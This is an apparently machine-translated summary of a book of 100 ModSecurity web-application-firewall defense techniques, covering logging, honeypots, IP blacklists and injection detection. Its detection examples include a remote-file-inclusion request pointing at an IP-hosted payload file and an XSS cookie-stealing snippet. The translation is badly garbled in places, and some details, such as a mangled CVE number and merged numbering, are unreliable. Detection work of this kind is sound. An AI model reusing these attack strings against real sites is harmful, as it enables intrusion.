Web Application Security Defense 100 Technology
How to defend against web Application Security is a question that every web security practitioner may ask. It is very difficult to answer. It is easy to be too superficial or theoretical. To clarify clearly, the answer is the length of a book. This article will introduce a good book that can easily answer this question-web application defender's cookbook, which is an underestimating "dry goods" book. Although it is tailored for ModSecurity, however, the defense techniques mentioned in this article are inspired by web security practitioners and are Sun Tzu's Art of War (interestingly, every chapter in this book uses Sun Tzu's Art of War as an example ). This book presents 100 tips for using ModSecurity to defend against web Application Security. Each skill is illustrated in real cases, which is very easy to master, the following describes the 100 technology and personal comments (you are ready to get sprayed :)). 1st real-time analysis of HTTP request features such as request method, parameter name, number of parameters, parameter length, parameter value type (numbers, letters, email, URL or file path: whitelist HTTP requests or whitelist URIs with vulnerabilities to ensure accuracy. 2nd hashtoken verification to prevent data tampering. For example: http://xxx.xxx.xxx/?p=4&rv_token=aafb509403bbf7d78c3c8fe1735d49f01b90eb64rv_token Verification 3rd technology install OWASPModSecurityCRS this rule set has two modes, one independent detection mode, one collaborative detection mode (Rule evaluation) 4th technology to convert IDSSnort rules to ModSecurity rules using snort2modsec2. pl scripts convert Snort rules into ModSecurity rules, effectively link each level to form a barrier 5th technology use Bayesian classification algorithms to distinguish malicious requests 6th technology to enable HTTP log audit, set the granularity to all records 7th technology to enable HTTP log audit, set the granularity to some records, for example, to record only HTTP request 8th with a 4xx response code to enable HTTP log auditing, do not record the static resource access request 9th technology to confuse sensitive information in HTTP logs ***: The starting point is to respect user privacy, however, many CDN vendors do not do this. 10th using syslog To forward server warning information to the central log platform for the log collection phase in the distributed/collaborative defense system. For example, they submit the information to the SIEM system for analysis. 1st 1. Use the more friendly ModSecurity audit control platform AuditConsole 12th technology to passively identify vulnerabilities-read vulnerability libraries (such as OSVDB) to identify vulnerabilities and defend against 13th active vulnerability identification solutions-call scanners (such as Arachni) to identify vulnerabilities and conduct defense 14th to manually convert scanner results to defense rules 15th to automatically convert scanner results to defense rules using Arachi2modsec. pl script converts the arachi scan report to the ModSecurity rule 16th real-time call scanner (for example, ArachniRPC) for defense 17th technical settings honeypot, the 18th technology of the newly opened listening port sets honeypot, the pseudo robots.txt disallow item and the request brain hole for forging 401 request identity verification: in fact, there has also been a "regular" search engine in China that does not comply with the robots protocol, in the case of crawling the disallow path, 19th set honeypot and forge the HTML annotation brain hole: hackers usually comment in the HTML code For sensitive information, Burpsuite provides the "findcomments" function. For example, add a nonexistent uri in the comment area to capture the honeypot of hacker 20th settings, forge the hidden form field (hiddenformfields), and add a hidden form field debug, if the HTTP request contains this hidden form, it indicates that the request has an attack intention. In this case, the 21st technique sets honeypot, the cookie 22nd technique uses the IP address reputation library, and queries the visitor's IP address information brain hole: MaxMindIP library, it is estimated that no one has heard of 23rd technology using the IP address reputation library, identifying malicious proxy 24th technology calling online RBL (real-timeblacklist) Library (such as sbl-xbl.spamhaus.org ), identify malicious IP addresses to query the IP address black library provided by the International Anti-Spam Organization online, or call the open-source IP blacklist collection honeypot api httpbl (HoneypotHTTPBlacklist) perform IP address reputation query 25th to create your own RBL and use jwall-rbld to create your own RBL, https://jwall.org/ Provides a number of java-compiled web security tools, such as URIBL and GoogleSafeBrowsingAPI, to call the URI black library and identify malicious URI holes: BAT, 26th, kingsoft and other large Internet companies have successively opened up their own malicious website library interface 27th Technology on-demand resolution of HTTP Request body detection is very performance-consuming, therefore, we need to add various optimization restrictions, such as the check body length limit and whether the request body cached to the local file system is parsed (such as naxsi does not parse this ), whether to parse XML Entity types and other 28th technical identification non-compliant with protocol specifications The Request body with Potential Malicious requests that cannot be parsed by the Protocol parsing component has the possibility of being malicious, for example, in a multipart-form file upload package, construct a malicious format to bypass the restrictions of the uploaded file type. 29th technical standardization Unicode encoding WAF bypass skills include a major branch-encoding bypass, using the encoding ing canonicalized encoding is a good idea. 30th technology to identify multiple encodings, for example, two urlencode 31st technology to identify abnormal code verification whether it is a canonicalized Encoding 32. identify abnormal HTTP request methods to create an HTTP request whitelist, for example, only GET, POST, and HEAD 33rd techniques are allowed to recognize URI formats that do not comply with RFC2616. 34th techniques are used to identify HTTP Request Header exceptions, such as missing HTTP request headers, abnormal Request Header order, and request header values. exception 35th skill through redundant Parameter Identification attack 36th skill through Missing Parameter Identification attack 37th skill through repeated parameter (HPP) identifying attack holes: duplicate parameters may also occur in normal applications. why !!! 38th skill pass parameter value length exception identification attack 39th skill pass parameter value character type exception identification attack adopt parameter value White List Method to defend 40th skill recognition HTTP Response Header exception such as 5xx Error Ratio, HTTP Response Splitting: Malicious redirection: 41st prevents information leakage in the HTTP Response Header. Remove or forge a service signature Response Header, such as Server, X-Powerd-, x-AspNet-Version 42nd: On-Demand parsing of HTTP response body detection is extremely performance-consuming, therefore, we need to carefully set the resolution of HTTP response body 43rd technology to detect webpage tampering-title tampering: each website that is "black" is marked with a wire rod 44th for web page tampering detection-response body length exception when webpage content is tampered or the back-end DB is dragged to the database, the response body size changes significantly, but this method must be used with caution, easy to false alarm 45th technology to detect web page tampering-response body dynamic content tampering, for example, injecting a <script> alert (document. cookie); </script>, check the response body A new JS tag will appear, and attacks can be detected based on the number of tags. 46th technology detection response body source code leakage such as php-cgi Source Code leakage vulnerability CVE-201201823 47th technology detection response body information leakage such as the response body leakage source code absolute path, database Information 48th technology detects attacks through abnormal response time, for example, time-based SQL blind note waitfordelay will cause abnormal response time 49th technology detects user data leakage in the response body, for example, credit card number 50th Technology detect trojans, backdoors, webshell connections try 51st tech monitoring logon attempts using common accounts such as using adminadministratorrootsystem as usernames try to log on to 52nd tech monitoring logon port horizontal brute force cracking use the same password, different usernames are used to try brute-force cracking. logon attempts for 53rd failed tech monitoring: logon attempts for 54th tech monitoring/high-frequency logon attempts: 55th tips for using unified logon failures, to prevent the leakage of useful information, such as the wrong user name or wrong password, this prompt will provide valid information for brute force cracking 56th technology enable password complexity detection 57th Technology Analysis for a session period, the username of the logon attempt is used to detect abnormal logon ports. The cookie value is based on the session attack, including the session ID value that can be guessed (burpsuite integrates the session sequence analysis tool) 59th technology detects attacks from cookie fields, such as SQL injection in the cookie field 60th technology sets the session validity period to defend against session fixed attacks 61st technology detects a session period, change in the GEO information of the requester's IP address 62nd technology detects a session period. The change in the requester's fingerprint is generally used by the anti-fraud system to identify the user, including the visitor's screen size, time zone, language settings: the browser plug-in 63rd detects non-ASCII characters in the requester, for example, NULL character % 00 brain hole: You can see the naxsi basic rule file, 90% of the rules are used to detect non-ASCII characters. 64th of the rules are used to detect directory traversal attacks. 65th of the rules are used to detect unusual Website Resource Access Control URLs for horizontal elevation of permissions, you can use encrypted tokens (such as urlhash) to defend against arbitrary resource access for vertical permission escalation operations, as shown below: https://www.REDACTED.com/Cust/cust_5.php/222557/20040216?rv_token=abfb508403bbf7d78c3f8de1735d49f01b90eb71 66th technology detection SQL injection attacks SQL Injection defense methods there are generally three (1) SQL keyword filter (2) SQL semantic analysis (3) Naive Bayes exception classification (plans to open a blog for details) 67th Remote File Inclusion Vulnerability: When the URI contains the following conditions, it is very likely to be an attack request IP address, such as/. php? Libdir = http://89.238.174.14/fx.txt???PHP Function, such /? Id = {$ {include (" http://xxx.xx.xx/fx.txt ??)}} Multiple?, Such as/a. php? Libdir = http://xxx.xx.xx/cgi ??? The host and Host header fields are inconsistent, for example,/a. php? Libdir = http://www.example.com 68th technology Detection Operating System Command Execution Vulnerability 69th technology detection HTTPRequestSmugglingHRS attacks 70th technology detection HTTP Response Splitting vulnerability 71st technology detection XML attacks such as XPath injection 72nd technology use CSP policy defense 73rd technology detection XSS attacks XSS there are generally three kinds of defense methods (1) XSS keyword filter (2) X-XSS-PROTECTION (3) javascript sandbox 74th technology detection CRSF attack CSRF defense method: Encrypted token 75th technology defense UIRedressing (clickjacking) clickjacking defense method :( 1) x-Frame-Options (2) frame-bustingjavascript 76th anti-Trojan-man-in-the-middle attack Trojans generally intercept HTTP requests and forge logon interfaces to steal accounts, the defense against such phishing attacks is inspired by the file integrity detection tool tripwires. the md5 value of the JS injection response body is appended to the login page to verify the page integrity.. 77th restrict the size of uploaded files to prevent server denial-of-service attacks caused by uploading large files. 78th restrict the number of uploaded files, prevents Server Denial-of-service attacks caused by excessive file uploads. 79th integrates virus scanning tools (such as ClamAV) and detects whether the uploaded files are malicious files. 80th HTTPDDoS (CC) the most famous attack tools for attack identification include loworbitioncannonLOIC and highorbitioncannonHOIC. Note that the same technology as 8th only monitors dynamic pages, because requests from static resources are usually cached to CDN nodes, but cannot reach the origin site. The 81st HTTPslowDDoS attack recognition tool is slowloris 82nd. It can detect whether the response time of subsequent requests is approaching. detects CSRF attacks such as CSRF A GET request is sent when the victim accesses the Image Tag. The interval between the two requests is very short. 83rd technology is used to detect abnormal HTTP Request order. Automated attacks often minimize the operation steps, we can refer to 2nd technology, 65th technology, and add token to prevent automated attacks. 84th technology to identify abnormal access to specific website resources. When the access to a specific website resource is abnormal, this often means that the attack has occurred. For example, in the CSRF worm attack on Sina Weibo, the interface for sending Weibo messages is automatically called. The association analysis between multiple HTTP requests of 85th technology enables the collaborative detection mode (Rule evaluation ), for example, when a single IP Address/session is triggered, 86th is used to dynamically enable WAF log audit. For example, when a request from the IP address blacklist is received, enable the log audit function 87th technical email sending WAF collaborative defense details to the webmaster. You can call external email sending scripts or use the AuditConsole platform (mentioned in 11th) sending 88th technology shares WAF event information with other security components through the Request Header for linkage analysis. When a low-level security attack is captured, direct interception is not good. At this time, you can share the WAF event information with other security components for linkage analysis to implement reasonable response measures, passing WAF event information through the HTTP request header is a good solution (this method is called requestheadertagging ). 89th redirect attack requests to user-friendly custom blocking pages 90th disconnect the attacker's network connection this measure is often used in denial of service attacks, for example, CC attack 91st uses IP blacklist blocking tools to block access by malicious users. Generally, the User-Agent and IP address are combined to block access by malicious users. common blacklist blocking tools include jwall-Rbld, jwallAuditConsole, blacklist, samtool (snortsam) 92nd techniques dynamically enable hierarchical defense based on IP-GEO information such as discovering a large number of attackers from country X, enable advanced defense 93rd against country X by delaying the response time to the request to mitigate automated attacks, and give the defender time to respond to the attack 94th. The response page of the successful attack is used to confuse the attacker, give the defender time to cope with the attack. Integrate honeypot's defense ideology. 95th technology proxy the attack request to honeypot 96th technology. When a session exception is detected, force the attacker to log out. For example, when the useragent changes during a session, force the attacker to log out of the server 97th during the attack. When a block occurs, the attacker account is locked for a period of time. 98th technology uses JS injection to block traffic attacks (such as CC attacks). 99th technology uses verification codes to block automated (MACHINE) attacks, such as automatic registration, automatic spam and other robot behavior brain holes: note that the verification code server should be robust enough to prevent this measure from being ineffective when a Denial-of-Service attack is triggered. 100th Technology Integration BeFF (browserexploitframework) after analyzing malicious user requests, we will find that the following tools (specifications or methods) WAF (web application firewall) appear in these 100 defense techniques ), snort, OSVDB, honeypot, Arachni, BeFF, ClamAV ), tripwires (file integrity verification tool, which can be used in the web field to prevent HTTP request data tampering, phishing page forgery and automated request submission), RBL (Real-time IP blacklist library, IP reputation Library), URIBLGoogleSafeBrows IngAPI (malicious URL Library), javascriptsandbox (sandbox), SIEM (Security Information and event management platform), SQL lexical analyzer, HTTPRFC specification, encoding ing table, And Naive Bayes classification algorithm, it is easy to find that web security defense is a whole, and various components (checkpoints) need to be effectively linked to form barriers. Security Defense methods are not strictly distinguished by fields, client Security skills can be used for the web, and vice versa. If you cannot find a complete separate solution to solve a security problem, you may wish to use different flawed defense solutions at the same time, the three stinkers have the top Zhuge Liang.